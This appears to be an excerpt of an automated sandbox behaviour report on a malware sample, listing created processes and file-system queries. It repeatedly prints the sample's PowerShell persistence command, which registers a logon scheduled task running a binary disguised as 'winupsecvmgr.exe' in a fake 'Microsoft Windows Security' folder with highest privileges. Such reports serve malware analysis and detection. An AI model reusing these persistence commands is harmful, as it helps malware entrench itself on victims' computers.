                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /fJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrCode function: GetLocaleInfoA,strcmp,3_2_0040F1B0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,4_2_0040F1B0
                                Source: C:\Windows\sysppvrdnvs.exeCode function: GetLocaleInfoA,strcmp,18_2_0040F1B0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1881231804.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1881231804.exe VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
